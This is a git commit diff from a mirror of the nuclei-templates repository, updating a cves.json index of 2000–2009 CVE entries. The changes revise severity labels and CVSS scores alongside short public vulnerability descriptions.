daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into release-prep-1

patch-1
Prince Chaddha 2023-07-18 15:05:51 +05:30
parent 195d4d029f b20847c2aa
commit 8b629277b8
10 changed files with 249 additions and 238 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

405
cves.json
View File

@ -1,117 +1,117 @@
{"ID":"CVE-2000-0114","Info":{"Name":"Microsoft FrontPage Extensions Check (shtml.dll)","Severity":"low","Description":"Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2000/CVE-2000-0114.yaml"}
{"ID":"CVE-2001-0537","Info":{"Name":"Cisco IOS HTTP Configuration - Authentication Bypass","Severity":"medium","Description":"HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.\n","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2001/CVE-2001-0537.yaml"}
{"ID":"CVE-2002-1131","Info":{"Name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2002/CVE-2002-1131.yaml"}
{"ID":"CVE-2000-0114","Info":{"Name":"Microsoft FrontPage Extensions Check (shtml.dll)","Severity":"medium","Description":"Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2000/CVE-2000-0114.yaml"}
{"ID":"CVE-2001-0537","Info":{"Name":"Cisco IOS HTTP Configuration - Authentication Bypass","Severity":"critical","Description":"HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2001/CVE-2001-0537.yaml"}
{"ID":"CVE-2002-1131","Info":{"Name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","Severity":"high","Description":"The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2002/CVE-2002-1131.yaml"}
{"ID":"CVE-2004-0519","Info":{"Name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2004/CVE-2004-0519.yaml"}
{"ID":"CVE-2004-1965","Info":{"Name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2004/CVE-2004-1965.yaml"}
{"ID":"CVE-2005-2428","Info":{"Name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","Severity":"medium","Description":"Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2005/CVE-2005-2428.yaml"}
{"ID":"CVE-2005-2428","Info":{"Name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","Severity":"medium","Description":"Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2005/CVE-2005-2428.yaml"}
{"ID":"CVE-2005-3344","Info":{"Name":"Horde Groupware Unauthenticated Admin Access","Severity":"critical","Description":"Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2005/CVE-2005-3344.yaml"}
{"ID":"CVE-2005-3634","Info":{"Name":"SAP Web Application Server 6.x/7.0 - Open Redirect","Severity":"medium","Description":"frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.\n","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2005/CVE-2005-3634.yaml"}
{"ID":"CVE-2005-3634","Info":{"Name":"SAP Web Application Server 6.x/7.0 - Open Redirect","Severity":"medium","Description":"frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2005/CVE-2005-3634.yaml"}
{"ID":"CVE-2005-4385","Info":{"Name":"Cofax \u003c=2.0RC3 - Cross-Site Scripting","Severity":"medium","Description":"Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2005/CVE-2005-4385.yaml"}
{"ID":"CVE-2006-1681","Info":{"Name":"Cherokee HTTPD \u003c=0.5 - Cross-Site Scripting","Severity":"medium","Description":"Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2006/CVE-2006-1681.yaml"}
{"ID":"CVE-2006-2842","Info":{"Name":"Squirrelmail \u003c=1.4.6 - Local File Inclusion","Severity":"high","Description":"SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2006/CVE-2006-2842.yaml"}
{"ID":"CVE-2006-2842","Info":{"Name":"Squirrelmail \u003c=1.4.6 - Local File Inclusion","Severity":"high","Description":"SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2006/CVE-2006-2842.yaml"}
{"ID":"CVE-2007-0885","Info":{"Name":"Jira Rainbow.Zen - Cross-Site Scripting","Severity":"medium","Description":"Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2007/CVE-2007-0885.yaml"}
{"ID":"CVE-2007-4504","Info":{"Name":"Joomla! RSfiles \u003c=1.0.2 - Local File Inclusion","Severity":"high","Description":"Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2007/CVE-2007-4504.yaml"}
{"ID":"CVE-2007-4556","Info":{"Name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","Severity":"critical","Description":"Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for\"m input beginning with a \"%{\" sequence and ending with a \"}\" character.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2007/CVE-2007-4556.yaml"}
{"ID":"CVE-2007-4504","Info":{"Name":"Joomla! RSfiles \u003c=1.0.2 - Local File Inclusion","Severity":"medium","Description":"Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2007/CVE-2007-4504.yaml"}
{"ID":"CVE-2007-4556","Info":{"Name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","Severity":"medium","Description":"Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for\"m input beginning with a \"%{\" sequence and ending with a \"}\" character.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2007/CVE-2007-4556.yaml"}
{"ID":"CVE-2007-5728","Info":{"Name":"phpPgAdmin \u003c=4.1.1 - Cross-Site Scripting","Severity":"medium","Description":"phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2007/CVE-2007-5728.yaml"}
{"ID":"CVE-2008-1059","Info":{"Name":"WordPress Sniplets 1.1.2 - Local File Inclusion","Severity":"high","Description":"PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2008/CVE-2008-1059.yaml"}
{"ID":"CVE-2008-1061","Info":{"Name":"WordPress Sniplets \u003c=1.2.2 - Cross-Site Scripting","Severity":"high","Description":"WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2008/CVE-2008-1061.yaml"}
{"ID":"CVE-2008-1059","Info":{"Name":"WordPress Sniplets 1.1.2 - Local File Inclusion","Severity":"high","Description":"PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2008/CVE-2008-1059.yaml"}
{"ID":"CVE-2008-1061","Info":{"Name":"WordPress Sniplets \u003c=1.2.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-1061.yaml"}
{"ID":"CVE-2008-1547","Info":{"Name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","Severity":"medium","Description":"Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-1547.yaml"}
{"ID":"CVE-2008-2398","Info":{"Name":"AppServ Open Project \u003c=2.5.10 - Cross-Site Scripting","Severity":"medium","Description":"AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-2398.yaml"}
{"ID":"CVE-2008-2650","Info":{"Name":"CMSimple 3.1 - Local File Inclusion","Severity":"high","Description":"CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-2650.yaml"}
{"ID":"CVE-2008-4668","Info":{"Name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","Severity":"high","Description":"Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2008/CVE-2008-4668.yaml"}
{"ID":"CVE-2008-4764","Info":{"Name":"Joomla! \u003c=2.0.0 RC2 - Local File Inclusion","Severity":"high","Description":"Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-4764.yaml"}
{"ID":"CVE-2008-2650","Info":{"Name":"CMSimple 3.1 - Local File Inclusion","Severity":"medium","Description":"CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2008/CVE-2008-2650.yaml"}
{"ID":"CVE-2008-4668","Info":{"Name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","Severity":"critical","Description":"Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2008/CVE-2008-4668.yaml"}
{"ID":"CVE-2008-4764","Info":{"Name":"Joomla! \u003c=2.0.0 RC2 - Local File Inclusion","Severity":"medium","Description":"Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2008/CVE-2008-4764.yaml"}
{"ID":"CVE-2008-5587","Info":{"Name":"phpPgAdmin \u003c=4.2.1 - Local File Inclusion","Severity":"medium","Description":"phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-5587.yaml"}
{"ID":"CVE-2008-6080","Info":{"Name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","Severity":"high","Description":"Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-6080.yaml"}
{"ID":"CVE-2008-6172","Info":{"Name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2008/CVE-2008-6172.yaml"}
{"ID":"CVE-2008-6222","Info":{"Name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","Severity":"high","Description":"Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-6222.yaml"}
{"ID":"CVE-2008-6465","Info":{"Name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","Severity":"medium","Description":"Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2008/CVE-2008-6465.yaml"}
{"ID":"CVE-2008-6668","Info":{"Name":"nweb2fax \u003c=0.2.7 - Local File Inclusion","Severity":"high","Description":"nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-6668.yaml"}
{"ID":"CVE-2008-6982","Info":{"Name":"Devalcms 1.4a - Cross-Site Scripting","Severity":"high","Description":"Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2008/CVE-2008-6982.yaml"}
{"ID":"CVE-2008-6080","Info":{"Name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","Severity":"medium","Description":"Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2008/CVE-2008-6080.yaml"}
{"ID":"CVE-2008-6172","Info":{"Name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2008/CVE-2008-6172.yaml"}
{"ID":"CVE-2008-6222","Info":{"Name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","Severity":"medium","Description":"Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2008/CVE-2008-6222.yaml"}
{"ID":"CVE-2008-6465","Info":{"Name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","Severity":"medium","Description":"Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-6465.yaml"}
{"ID":"CVE-2008-6668","Info":{"Name":"nweb2fax \u003c=0.2.7 - Local File Inclusion","Severity":"medium","Description":"nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2008/CVE-2008-6668.yaml"}
{"ID":"CVE-2008-6982","Info":{"Name":"Devalcms 1.4a - Cross-Site Scripting","Severity":"medium","Description":"Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-6982.yaml"}
{"ID":"CVE-2008-7269","Info":{"Name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2008/CVE-2008-7269.yaml"}
{"ID":"CVE-2009-0347","Info":{"Name":"Autonomy Ultraseek - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2009/CVE-2009-0347.yaml"}
{"ID":"CVE-2009-0545","Info":{"Name":"ZeroShell \u003c= 1.0beta11 Remote Code Execution","Severity":"critical","Description":"ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2009/CVE-2009-0545.yaml"}
{"ID":"CVE-2009-0932","Info":{"Name":"Horde/Horde Groupware - Local File Inclusion","Severity":"high","Description":"Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-0932.yaml"}
{"ID":"CVE-2009-1151","Info":{"Name":"PhpMyAdmin Scripts - Remote Code Execution","Severity":"critical","Description":"PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2009/CVE-2009-1151.yaml"}
{"ID":"CVE-2009-1496","Info":{"Name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","Severity":"high","Description":"Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-1496.yaml"}
{"ID":"CVE-2009-1558","Info":{"Name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","Severity":"high","Description":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-1558.yaml"}
{"ID":"CVE-2009-0932","Info":{"Name":"Horde/Horde Groupware - Local File Inclusion","Severity":"medium","Description":"Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2009/CVE-2009-0932.yaml"}
{"ID":"CVE-2009-1151","Info":{"Name":"PhpMyAdmin Scripts - Remote Code Execution","Severity":"high","Description":"PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-1151.yaml"}
{"ID":"CVE-2009-1496","Info":{"Name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","Severity":"medium","Description":"Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2009/CVE-2009-1496.yaml"}
{"ID":"CVE-2009-1558","Info":{"Name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","Severity":"high","Description":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.","Classification":{"CVSSScore":"7.8"}},"file_path":"http/cves/2009/CVE-2009-1558.yaml"}
{"ID":"CVE-2009-1872","Info":{"Name":"Adobe Coldfusion \u003c=8.0.1 - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2009/CVE-2009-1872.yaml"}
{"ID":"CVE-2009-2015","Info":{"Name":"Joomla! MooFAQ 1.0 - Local File Inclusion","Severity":"high","Description":"Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-2015.yaml"}
{"ID":"CVE-2009-2100","Info":{"Name":"Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion","Severity":"high","Description":"Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-2100.yaml"}
{"ID":"CVE-2009-3053","Info":{"Name":"Joomla! Agora 3.0.0b - Local File Inclusion","Severity":"high","Description":"Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-3053.yaml"}
{"ID":"CVE-2009-2015","Info":{"Name":"Joomla! MooFAQ 1.0 - Local File Inclusion","Severity":"high","Description":"Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-2015.yaml"}
{"ID":"CVE-2009-2100","Info":{"Name":"Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion","Severity":"medium","Description":"Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2009/CVE-2009-2100.yaml"}
{"ID":"CVE-2009-3053","Info":{"Name":"Joomla! Agora 3.0.0b - Local File Inclusion","Severity":"medium","Description":"Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2009/CVE-2009-3053.yaml"}
{"ID":"CVE-2009-3318","Info":{"Name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","Severity":"high","Description":"Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-3318.yaml"}
{"ID":"CVE-2009-4202","Info":{"Name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","Severity":"high","Description":"Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-4202.yaml"}
{"ID":"CVE-2009-4223","Info":{"Name":"KR-Web \u003c=1.1b2 - Remote File Inclusion","Severity":"high","Description":"KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-4223.yaml"}
{"ID":"CVE-2009-4679","Info":{"Name":"Joomla! Portfolio Nexus - Remote File Inclusion","Severity":"high","Description":"Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-4679.yaml"}
